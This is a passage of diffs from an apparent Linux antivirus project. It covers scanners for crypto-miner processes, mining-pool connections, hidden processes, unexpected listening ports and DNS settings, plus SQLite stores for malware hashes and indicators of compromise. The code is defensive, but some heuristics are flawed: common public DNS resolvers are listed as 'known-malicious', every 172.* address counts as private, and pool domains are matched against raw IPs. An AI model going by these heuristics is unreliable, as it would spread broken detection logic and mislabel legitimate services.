Returns a list of decoded strings (capped at 500 chars each).
"""
regions = self._read_maps(pid)
strings: List[str] = []
printable_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
for region in regions:
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 10 * 1024 * 1024:
continue # skip huge regions
data = self._read_region(pid, region["start"], region["end"])
for match in printable_re.finditer(data):
s = match.group().decode("ascii", errors="replace")
strings.append(s[:500])
# Cap total to avoid unbounded memory usage.
if len(strings) >= 10_000:
return strings
return strings
def scan_for_patterns(
self,
pid: int,
patterns: Optional[Sequence[bytes]] = None,
) -> List[Dict[str, Any]]:
"""Search process memory for specific byte patterns.
Parameters
----------
patterns:
Byte strings to search for. Defaults to
:pydata:`_DEFAULT_PATTERNS` (mining pool URLs, stratum prefixes,
shell commands).
Returns a list of dicts with ``pattern``, ``region_start``,
``region_perms``, ``offset``.
"""
if patterns is None:
patterns = _DEFAULT_PATTERNS
regions = self._read_maps(pid)
matches: List[Dict[str, Any]] = []
for region in regions:
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 50 * 1024 * 1024:
continue
data = self._read_region(pid, region["start"], region["end"])
for pat in patterns:
idx = data.find(pat)
if idx != -1:
matches.append({
"pattern": pat.decode("utf-8", errors="replace"),
"region_start": hex(region["start"]),
"region_perms": region["perms"],
"region_pathname": region["pathname"],
"offset": idx,
"severity": "HIGH",
"reason": f"Suspicious pattern found in memory: {pat[:60]!r}",
})
return matches

View File

@@ -0,0 +1,328 @@
"""Network scanner for AYN Antivirus.
Inspects active TCP/UDP connections for traffic to known mining pools,
suspicious ports, and unexpected listening services. Also audits
``/etc/resolv.conf`` for DNS hijacking indicators.
"""
from __future__ import annotations
import logging
import re
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_POOL_DOMAINS,
SUSPICIOUS_PORTS,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# Well-known system services that are *expected* to listen — extend as needed.
_EXPECTED_LISTENERS = {
22: "sshd",
53: "systemd-resolved",
80: "nginx",
443: "nginx",
3306: "mysqld",
5432: "postgres",
6379: "redis-server",
8080: "java",
}
# Known-malicious / suspicious public DNS servers sometimes injected by
# malware into resolv.conf to redirect DNS queries.
_SUSPICIOUS_DNS_SERVERS = [
"8.8.4.4", # not inherently bad, but worth noting if unexpected
"1.0.0.1",
"208.67.222.123",
"198.54.117.10",
"77.88.8.7",
"94.140.14.14",
]
class NetworkScanner(BaseScanner):
"""Scan active network connections for suspicious activity.
Wraps :func:`psutil.net_connections` and enriches each connection with
process ownership and threat classification.
"""
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "network_scanner"
@property
def description(self) -> str:
return "Inspects network connections for mining pools and suspicious ports"
def scan(self, target: Any = None) -> Dict[str, Any]:
"""Run a full network scan.
*target* is ignored — all connections are inspected.
Returns
-------
dict
``total``, ``suspicious``, ``unexpected_listeners``, ``dns_issues``.
"""
all_conns = self.get_all_connections()
suspicious = self.find_suspicious_connections()
listeners = self.check_listening_ports()
dns = self.check_dns_queries()
return {
"total": len(all_conns),
"suspicious": suspicious,
"unexpected_listeners": listeners,
"dns_issues": dns,
}
# ------------------------------------------------------------------
# Connection enumeration
# ------------------------------------------------------------------
@staticmethod
def get_all_connections() -> List[Dict[str, Any]]:
"""Return a snapshot of every inet connection.
Each dict contains: ``fd``, ``family``, ``type``, ``local_addr``,
``remote_addr``, ``status``, ``pid``, ``process_name``.
"""
result: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return result
for conn in connections:
local = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else ""
remote = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else ""
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
result.append({
"fd": conn.fd,
"family": str(conn.family),
"type": str(conn.type),
"local_addr": local,
"remote_addr": remote,
"status": conn.status,
"pid": conn.pid,
"process_name": proc_name,
})
return result
# ------------------------------------------------------------------
# Suspicious-connection detection
# ------------------------------------------------------------------
def find_suspicious_connections(self) -> List[Dict[str, Any]]:
"""Identify connections to known mining pools or suspicious ports.
Checks remote addresses against :pydata:`constants.CRYPTO_POOL_DOMAINS`
and :pydata:`constants.SUSPICIOUS_PORTS`.
"""
suspicious: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return suspicious
for conn in connections:
raddr = conn.raddr
if not raddr:
continue
remote_ip = raddr.ip
remote_port = raddr.port
local_str = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else "?"
remote_str = f"{remote_ip}:{remote_port}"
proc_info = self.resolve_process_for_connection(conn)
# Suspicious port.
if remote_port in SUSPICIOUS_PORTS:
suspicious.append({
"local_addr": local_str,
"remote_addr": remote_str,
"pid": conn.pid,
"process": proc_info,
"status": conn.status,
"reason": f"Connection on known mining port {remote_port}",
"severity": "HIGH",
})
# Mining-pool domain (substring match on IP / hostname).
for domain in CRYPTO_POOL_DOMAINS:
if domain in remote_ip:
suspicious.append({
"local_addr": local_str,
"remote_addr": remote_str,
"pid": conn.pid,
"process": proc_info,
"status": conn.status,
"reason": f"Connection to known mining pool: {domain}",
"severity": "CRITICAL",
})
break
return suspicious
# ------------------------------------------------------------------
# Listening-port audit
# ------------------------------------------------------------------
@staticmethod
def check_listening_ports() -> List[Dict[str, Any]]:
"""Return listening sockets that are *not* in the expected-services list.
Unexpected listeners may indicate a backdoor or reverse shell.
"""
unexpected: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return unexpected
for conn in connections:
if conn.status != "LISTEN":
continue
port = conn.laddr.port if conn.laddr else None
if port is None:
continue
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
expected_name = _EXPECTED_LISTENERS.get(port)
if expected_name and expected_name in proc_name:
continue # known good
# Skip very common ephemeral / system ports when we can't resolve.
if port > 49152:
continue
if port not in _EXPECTED_LISTENERS:
unexpected.append({
"port": port,
"local_addr": f"{conn.laddr.ip}:{port}" if conn.laddr else f"?:{port}",
"pid": conn.pid,
"process_name": proc_name,
"reason": f"Unexpected listening service on port {port}",
"severity": "MEDIUM",
})
return unexpected
# ------------------------------------------------------------------
# Process resolution
# ------------------------------------------------------------------
@staticmethod
def resolve_process_for_connection(conn: Any) -> Dict[str, Any]:
"""Return basic process info for a ``psutil`` connection object.
Returns
-------
dict
``pid``, ``name``, ``cmdline``, ``username``.
"""
info: Dict[str, Any] = {
"pid": conn.pid,
"name": "",
"cmdline": [],
"username": "",
}
if not conn.pid:
return info
try:
proc = psutil.Process(conn.pid)
info["name"] = proc.name()
info["cmdline"] = proc.cmdline()
info["username"] = proc.username()
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass
return info
# ------------------------------------------------------------------
# DNS audit
# ------------------------------------------------------------------
@staticmethod
def check_dns_queries() -> List[Dict[str, Any]]:
"""Audit ``/etc/resolv.conf`` for suspicious DNS server entries.
Malware sometimes rewrites ``resolv.conf`` to redirect DNS through an
attacker-controlled resolver, enabling man-in-the-middle attacks or
DNS-based C2 communication.
"""
issues: List[Dict[str, Any]] = []
resolv_path = Path("/etc/resolv.conf")
if not resolv_path.exists():
return issues
try:
content = resolv_path.read_text()
except PermissionError:
logger.warning("Cannot read /etc/resolv.conf")
return issues
nameserver_re = re.compile(r"^\s*nameserver\s+(\S+)", re.MULTILINE)
for match in nameserver_re.finditer(content):
server = match.group(1)
if server in _SUSPICIOUS_DNS_SERVERS:
issues.append({
"server": server,
"file": str(resolv_path),
"reason": f"Potentially suspicious DNS server: {server}",
"severity": "MEDIUM",
})
# Flag non-RFC1918 / non-loopback servers that look unusual.
if not (
server.startswith("127.")
or server.startswith("10.")
or server.startswith("192.168.")
or server.startswith("172.")
or server == "::1"
):
# External DNS — not inherently bad but worth logging if the
# admin didn't set it intentionally.
issues.append({
"server": server,
"file": str(resolv_path),
"reason": f"External DNS server configured: {server}",
"severity": "LOW",
})
return issues

View File

@@ -0,0 +1,387 @@
"""Process scanner for AYN Antivirus.
Inspects running processes for known crypto-miners, anomalous CPU usage,
and hidden / stealth processes. Uses ``psutil`` for cross-platform process
enumeration and ``/proc`` on Linux for hidden-process detection.
"""
from __future__ import annotations
import logging
import os
import signal
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_MINER_PROCESS_NAMES,
HIGH_CPU_THRESHOLD,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
class ProcessScanner(BaseScanner):
"""Scan running processes for malware, miners, and anomalies.
Parameters
----------
cpu_threshold:
CPU-usage percentage above which a process is flagged. Defaults to
:pydata:`constants.HIGH_CPU_THRESHOLD`.
"""
def __init__(self, cpu_threshold: float = HIGH_CPU_THRESHOLD) -> None:
self.cpu_threshold = cpu_threshold
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "process_scanner"
@property
def description(self) -> str:
return "Inspects running processes for miners and suspicious activity"
def scan(self, target: Any = None) -> Dict[str, Any]:
"""Run a full process scan.
*target* is ignored — all live processes are inspected.
Returns
-------
dict
``total``, ``suspicious``, ``high_cpu``, ``hidden``.
"""
all_procs = self.get_all_processes()
suspicious = self.find_suspicious_processes()
high_cpu = self.find_high_cpu_processes()
hidden = self.find_hidden_processes()
return {
"total": len(all_procs),
"suspicious": suspicious,
"high_cpu": high_cpu,
"hidden": hidden,
}
# ------------------------------------------------------------------
# Process enumeration
# ------------------------------------------------------------------
@staticmethod
def get_all_processes() -> List[Dict[str, Any]]:
"""Return a snapshot of every running process.
Each dict contains: ``pid``, ``name``, ``cmdline``, ``cpu_percent``,
``memory_percent``, ``username``, ``create_time``, ``connections``,
``open_files``.
"""
result: List[Dict[str, Any]] = []
attrs = [
"pid", "name", "cmdline", "cpu_percent",
"memory_percent", "username", "create_time",
]
for proc in psutil.process_iter(attrs):
try:
info = proc.info
# Connections and open files are expensive; fetch lazily.
try:
connections = [
{
"fd": c.fd,
"family": str(c.family),
"type": str(c.type),
"laddr": f"{c.laddr.ip}:{c.laddr.port}" if c.laddr else "",
"raddr": f"{c.raddr.ip}:{c.raddr.port}" if c.raddr else "",
"status": c.status,
}
for c in proc.net_connections()
]
except (psutil.AccessDenied, psutil.NoSuchProcess, OSError):
connections = []
try:
open_files = [f.path for f in proc.open_files()]
except (psutil.AccessDenied, psutil.NoSuchProcess, OSError):
open_files = []
create_time = info.get("create_time")
result.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": info.get("cpu_percent") or 0.0,
"memory_percent": info.get("memory_percent") or 0.0,
"username": info.get("username", "?"),
"create_time": (
datetime.utcfromtimestamp(create_time).isoformat()
if create_time
else None
),
"connections": connections,
"open_files": open_files,
})
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return result
# ------------------------------------------------------------------
# Suspicious-process detection
# ------------------------------------------------------------------
def find_suspicious_processes(self) -> List[Dict[str, Any]]:
"""Return processes whose name or command line matches a known miner.
Matches are case-insensitive against
:pydata:`constants.CRYPTO_MINER_PROCESS_NAMES`.
"""
suspicious: List[Dict[str, Any]] = []
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent", "username"]):
try:
info = proc.info
pname = (info.get("name") or "").lower()
cmdline = " ".join(info.get("cmdline") or []).lower()
for miner in CRYPTO_MINER_PROCESS_NAMES:
if miner in pname or miner in cmdline:
suspicious.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": info.get("cpu_percent") or 0.0,
"username": info.get("username", "?"),
"matched_signature": miner,
"reason": f"Known miner process: {miner}",
"severity": "CRITICAL",
})
break # one match per process
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return suspicious
# ------------------------------------------------------------------
# High-CPU detection
# ------------------------------------------------------------------
def find_high_cpu_processes(
self,
threshold: Optional[float] = None,
) -> List[Dict[str, Any]]:
"""Return processes whose CPU usage exceeds *threshold* percent.
Parameters
----------
threshold:
Override the instance-level ``cpu_threshold``.
"""
limit = threshold if threshold is not None else self.cpu_threshold
high: List[Dict[str, Any]] = []
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent", "username"]):
try:
info = proc.info
cpu = info.get("cpu_percent") or 0.0
if cpu > limit:
high.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": cpu,
"username": info.get("username", "?"),
"reason": f"High CPU usage: {cpu:.1f}%",
"severity": "HIGH",
})
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return high
# ------------------------------------------------------------------
# Hidden-process detection (Linux only)
# ------------------------------------------------------------------
@staticmethod
def find_hidden_processes() -> List[Dict[str, Any]]:
"""Detect processes visible in ``/proc`` but hidden from ``psutil``.
On non-Linux systems this returns an empty list.
A mismatch may indicate a userland rootkit that hooks the process
listing syscalls.
"""
proc_dir = Path("/proc")
if not proc_dir.is_dir():
return [] # not Linux
# PIDs visible via /proc filesystem.
proc_pids: set[int] = set()
try:
for entry in proc_dir.iterdir():
if entry.name.isdigit():
proc_pids.add(int(entry.name))
except PermissionError:
logger.warning("Cannot enumerate /proc")
return []
# PIDs visible via psutil (which ultimately calls getdents / readdir).
psutil_pids = set(psutil.pids())
hidden: List[Dict[str, Any]] = []
for pid in proc_pids - psutil_pids:
# Read whatever we can from /proc/<pid>.
name = ""
cmdline = ""
try:
comm = proc_dir / str(pid) / "comm"
if comm.exists():
name = comm.read_text().strip()
except OSError:
pass
try:
cl = proc_dir / str(pid) / "cmdline"
if cl.exists():
cmdline = cl.read_bytes().replace(b"\x00", b" ").decode(errors="replace").strip()
except OSError:
pass
hidden.append({
"pid": pid,
"name": name,
"cmdline": cmdline,
"reason": "Process visible in /proc but hidden from psutil (possible rootkit)",
"severity": "CRITICAL",
})
return hidden
# ------------------------------------------------------------------
# Single-process detail
# ------------------------------------------------------------------
@staticmethod
def get_process_details(pid: int) -> Dict[str, Any]:
"""Return comprehensive information about a single process.
Raises
------
psutil.NoSuchProcess
If the PID does not exist.
psutil.AccessDenied
If the caller lacks permission to inspect the process.
"""
proc = psutil.Process(pid)
with proc.oneshot():
info: Dict[str, Any] = {
"pid": proc.pid,
"name": proc.name(),
"exe": "",
"cmdline": proc.cmdline(),
"status": proc.status(),
"username": "",
"cpu_percent": proc.cpu_percent(interval=0.1),
"memory_percent": proc.memory_percent(),
"memory_info": {},
"create_time": datetime.utcfromtimestamp(proc.create_time()).isoformat(),
"cwd": "",
"open_files": [],
"connections": [],
"threads": proc.num_threads(),
"nice": None,
"environ": {},
}
try:
info["exe"] = proc.exe()
except (psutil.AccessDenied, OSError):
pass
try:
info["username"] = proc.username()
except psutil.AccessDenied:
pass
try:
mem = proc.memory_info()
info["memory_info"] = {"rss": mem.rss, "vms": mem.vms}
except (psutil.AccessDenied, OSError):
pass
try:
info["cwd"] = proc.cwd()
except (psutil.AccessDenied, OSError):
pass
try:
info["open_files"] = [f.path for f in proc.open_files()]
except (psutil.AccessDenied, OSError):
pass
try:
info["connections"] = [
{
"laddr": f"{c.laddr.ip}:{c.laddr.port}" if c.laddr else "",
"raddr": f"{c.raddr.ip}:{c.raddr.port}" if c.raddr else "",
"status": c.status,
}
for c in proc.net_connections()
]
except (psutil.AccessDenied, OSError):
pass
try:
info["nice"] = proc.nice()
except (psutil.AccessDenied, OSError):
pass
try:
info["environ"] = dict(proc.environ())
except (psutil.AccessDenied, OSError):
pass
return info
# ------------------------------------------------------------------
# Process control
# ------------------------------------------------------------------
@staticmethod
def kill_process(pid: int) -> bool:
"""Send ``SIGKILL`` to the process with *pid*.
Returns ``True`` if the signal was delivered successfully, ``False``
otherwise (e.g. the process no longer exists or permission denied).
"""
try:
proc = psutil.Process(pid)
proc.kill() # SIGKILL
proc.wait(timeout=5)
logger.info("Killed process %d (%s)", pid, proc.name())
return True
except psutil.NoSuchProcess:
logger.warning("Process %d no longer exists", pid)
return False
except psutil.AccessDenied:
logger.error("Permission denied killing process %d", pid)
# Fall back to raw signal as a last resort.
try:
os.kill(pid, signal.SIGKILL)
logger.info("Killed process %d via os.kill", pid)
return True
except OSError as exc:
logger.error("os.kill(%d) failed: %s", pid, exc)
return False
except psutil.TimeoutExpired:
logger.warning("Process %d did not exit within timeout", pid)
return False

View File

@@ -0,0 +1,251 @@
"""SQLite-backed malware hash database for AYN Antivirus.
Stores SHA-256 / MD5 hashes of known threats with associated metadata
(threat name, type, severity, source feed) and provides efficient lookup,
bulk-insert, search, and export operations.
"""
from __future__ import annotations
import csv
import logging
import sqlite3
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence, Tuple
from ayn_antivirus.constants import DEFAULT_DB_PATH
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Schema
# ---------------------------------------------------------------------------
_SCHEMA = """
CREATE TABLE IF NOT EXISTS threats (
hash TEXT PRIMARY KEY,
threat_name TEXT NOT NULL,
threat_type TEXT NOT NULL DEFAULT 'MALWARE',
severity TEXT NOT NULL DEFAULT 'HIGH',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now')),
details TEXT NOT NULL DEFAULT ''
);
CREATE INDEX IF NOT EXISTS idx_threats_type ON threats(threat_type);
CREATE INDEX IF NOT EXISTS idx_threats_source ON threats(source);
CREATE INDEX IF NOT EXISTS idx_threats_name ON threats(threat_name);
CREATE TABLE IF NOT EXISTS meta (
key TEXT PRIMARY KEY,
value TEXT
);
"""
class HashDatabase:
"""Manage a local SQLite database of known-malicious file hashes.
Parameters
----------
db_path:
Path to the SQLite file. Created automatically (with parent dirs)
if it doesn't exist.
"""
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = Path(db_path)
self._conn: Optional[sqlite3.Connection] = None
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def initialize(self) -> None:
"""Open the database and create tables if necessary."""
self.db_path.parent.mkdir(parents=True, exist_ok=True)
self._conn = sqlite3.connect(str(self.db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute("PRAGMA journal_mode=WAL")
self._conn.executescript(_SCHEMA)
self._conn.commit()
logger.info("HashDatabase opened: %s (%d hashes)", self.db_path, self.count())
def close(self) -> None:
"""Flush and close the database."""
if self._conn:
self._conn.close()
self._conn = None
@property
def conn(self) -> sqlite3.Connection:
if self._conn is None:
self.initialize()
assert self._conn is not None
return self._conn
# ------------------------------------------------------------------
# Single-record operations
# ------------------------------------------------------------------
def add_hash(
self,
hash_str: str,
threat_name: str,
threat_type: str = "MALWARE",
severity: str = "HIGH",
source: str = "",
details: str = "",
) -> None:
"""Insert or replace a single hash record."""
self.conn.execute(
"INSERT OR REPLACE INTO threats "
"(hash, threat_name, threat_type, severity, source, added_date, details) "
"VALUES (?, ?, ?, ?, ?, ?, ?)",
(
hash_str.lower(),
threat_name,
threat_type,
severity,
source,
datetime.utcnow().isoformat(),
details,
),
)
self.conn.commit()
def lookup(self, hash_str: str) -> Optional[Dict[str, Any]]:
"""Look up a hash and return its metadata, or ``None``."""
row = self.conn.execute(
"SELECT * FROM threats WHERE hash = ?", (hash_str.lower(),)
).fetchone()
if row is None:
return None
return dict(row)
def remove(self, hash_str: str) -> bool:
"""Delete a hash record. Returns ``True`` if a row was deleted."""
cur = self.conn.execute(
"DELETE FROM threats WHERE hash = ?", (hash_str.lower(),)
)
self.conn.commit()
return cur.rowcount > 0
# ------------------------------------------------------------------
# Bulk operations
# ------------------------------------------------------------------
def bulk_add(
self,
records: Sequence[Tuple[str, str, str, str, str, str]],
) -> int:
"""Efficiently insert new hashes in a single transaction.
Uses ``INSERT OR IGNORE`` so existing entries are preserved and
only genuinely new hashes are counted.
Parameters
----------
records:
Sequence of ``(hash, threat_name, threat_type, severity, source, details)``
tuples.
Returns
-------
int
Number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [
(h.lower(), name, ttype, sev, src, now, det)
for h, name, ttype, sev, src, det in records
]
before = self.count()
self.conn.executemany(
"INSERT OR IGNORE INTO threats "
"(hash, threat_name, threat_type, severity, source, added_date, details) "
"VALUES (?, ?, ?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self.count() - before
# ------------------------------------------------------------------
# Query helpers
# ------------------------------------------------------------------
def count(self) -> int:
"""Total number of hashes in the database."""
return self.conn.execute("SELECT COUNT(*) FROM threats").fetchone()[0]
def get_stats(self) -> Dict[str, Any]:
"""Return aggregate statistics about the database."""
c = self.conn
by_type = {
row[0]: row[1]
for row in c.execute(
"SELECT threat_type, COUNT(*) FROM threats GROUP BY threat_type"
).fetchall()
}
by_source = {
row[0]: row[1]
for row in c.execute(
"SELECT source, COUNT(*) FROM threats GROUP BY source"
).fetchall()
}
latest = c.execute(
"SELECT MAX(added_date) FROM threats"
).fetchone()[0]
return {
"total": self.count(),
"by_type": by_type,
"by_source": by_source,
"latest_update": latest,
}
def search(self, query: str) -> List[Dict[str, Any]]:
"""Search threat names with a SQL LIKE pattern.
Example: ``search("%Trojan%")``
"""
rows = self.conn.execute(
"SELECT * FROM threats WHERE threat_name LIKE ? ORDER BY added_date DESC LIMIT 500",
(query,),
).fetchall()
return [dict(r) for r in rows]
# ------------------------------------------------------------------
# Export
# ------------------------------------------------------------------
def export_hashes(self, filepath: str | Path) -> int:
"""Export all hashes to a CSV file. Returns the row count."""
filepath = Path(filepath)
filepath.parent.mkdir(parents=True, exist_ok=True)
rows = self.conn.execute(
"SELECT hash, threat_name, threat_type, severity, source, added_date, details "
"FROM threats ORDER BY added_date DESC"
).fetchall()
with open(filepath, "w", newline="") as fh:
writer = csv.writer(fh)
writer.writerow(["hash", "threat_name", "threat_type", "severity", "source", "added_date", "details"])
for row in rows:
writer.writerow(list(row))
return len(rows)
# ------------------------------------------------------------------
# Meta helpers (used by manager to track feed state)
# ------------------------------------------------------------------
def set_meta(self, key: str, value: str) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO meta (key, value) VALUES (?, ?)", (key, value)
)
self.conn.commit()
def get_meta(self, key: str) -> Optional[str]:
row = self.conn.execute(
"SELECT value FROM meta WHERE key = ?", (key,)
).fetchone()
return row[0] if row else None

View File

@@ -0,0 +1,259 @@
"""SQLite-backed Indicator of Compromise (IOC) database for AYN Antivirus.
Stores malicious IPs, domains, and URLs sourced from threat-intelligence
feeds so that the network scanner and detectors can perform real-time
lookups.
"""
from __future__ import annotations
import logging
import sqlite3
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence, Set, Tuple
from ayn_antivirus.constants import DEFAULT_DB_PATH
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Schema
# ---------------------------------------------------------------------------
_SCHEMA = """
CREATE TABLE IF NOT EXISTS ioc_ips (
ip TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'C2',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_ips_source ON ioc_ips(source);
CREATE TABLE IF NOT EXISTS ioc_domains (
domain TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'C2',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_domains_source ON ioc_domains(source);
CREATE TABLE IF NOT EXISTS ioc_urls (
url TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'malware_distribution',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_urls_source ON ioc_urls(source);
"""
class IOCDatabase:
"""Manage a local SQLite store of Indicators of Compromise.
Parameters
----------
db_path:
Path to the SQLite file. Shares the same file as
:class:`HashDatabase` by default; each uses its own tables.
"""
_VALID_TABLES: frozenset = frozenset({"ioc_ips", "ioc_domains", "ioc_urls"})
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = Path(db_path)
self._conn: Optional[sqlite3.Connection] = None
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def initialize(self) -> None:
self.db_path.parent.mkdir(parents=True, exist_ok=True)
self._conn = sqlite3.connect(str(self.db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute("PRAGMA journal_mode=WAL")
self._conn.executescript(_SCHEMA)
self._conn.commit()
logger.info(
"IOCDatabase opened: %s (IPs=%d, domains=%d, URLs=%d)",
self.db_path,
self._count("ioc_ips"),
self._count("ioc_domains"),
self._count("ioc_urls"),
)
def close(self) -> None:
if self._conn:
self._conn.close()
self._conn = None
@property
def conn(self) -> sqlite3.Connection:
if self._conn is None:
self.initialize()
assert self._conn is not None
return self._conn
def _count(self, table: str) -> int:
if table not in self._VALID_TABLES:
raise ValueError(f"Invalid table name: {table}")
return self.conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
# ------------------------------------------------------------------
# IPs
# ------------------------------------------------------------------
def add_ip(
self,
ip: str,
threat_name: str = "",
type: str = "C2",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_ips (ip, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(ip, threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_ips(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert IPs. Each tuple: ``(ip, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(ip, tn, t, src, now) for ip, tn, t, src in records]
before = self._count("ioc_ips")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_ips (ip, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_ips") - before
def lookup_ip(self, ip: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_ips WHERE ip = ?", (ip,)
).fetchone()
return dict(row) if row else None
def get_all_malicious_ips(self) -> Set[str]:
"""Return every stored malicious IP as a set for fast membership tests."""
rows = self.conn.execute("SELECT ip FROM ioc_ips").fetchall()
return {row[0] for row in rows}
# ------------------------------------------------------------------
# Domains
# ------------------------------------------------------------------
def add_domain(
self,
domain: str,
threat_name: str = "",
type: str = "C2",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_domains (domain, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(domain.lower(), threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_domains(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert domains. Each tuple: ``(domain, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(d.lower(), tn, t, src, now) for d, tn, t, src in records]
before = self._count("ioc_domains")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_domains (domain, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_domains") - before
def lookup_domain(self, domain: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_domains WHERE domain = ?", (domain.lower(),)
).fetchone()
return dict(row) if row else None
def get_all_malicious_domains(self) -> Set[str]:
"""Return every stored malicious domain as a set."""
rows = self.conn.execute("SELECT domain FROM ioc_domains").fetchall()
return {row[0] for row in rows}
# ------------------------------------------------------------------
# URLs
# ------------------------------------------------------------------
def add_url(
self,
url: str,
threat_name: str = "",
type: str = "malware_distribution",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_urls (url, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(url, threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_urls(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert URLs. Each tuple: ``(url, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(u, tn, t, src, now) for u, tn, t, src in records]
before = self._count("ioc_urls")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_urls (url, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_urls") - before
def lookup_url(self, url: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_urls WHERE url = ?", (url,)
).fetchone()
return dict(row) if row else None
# ------------------------------------------------------------------
# Aggregate stats
# ------------------------------------------------------------------
def get_stats(self) -> Dict[str, Any]:
return {
"ips": self._count("ioc_ips"),
"domains": self._count("ioc_domains"),
"urls": self._count("ioc_urls"),
}

View File

@@ -0,0 +1,92 @@
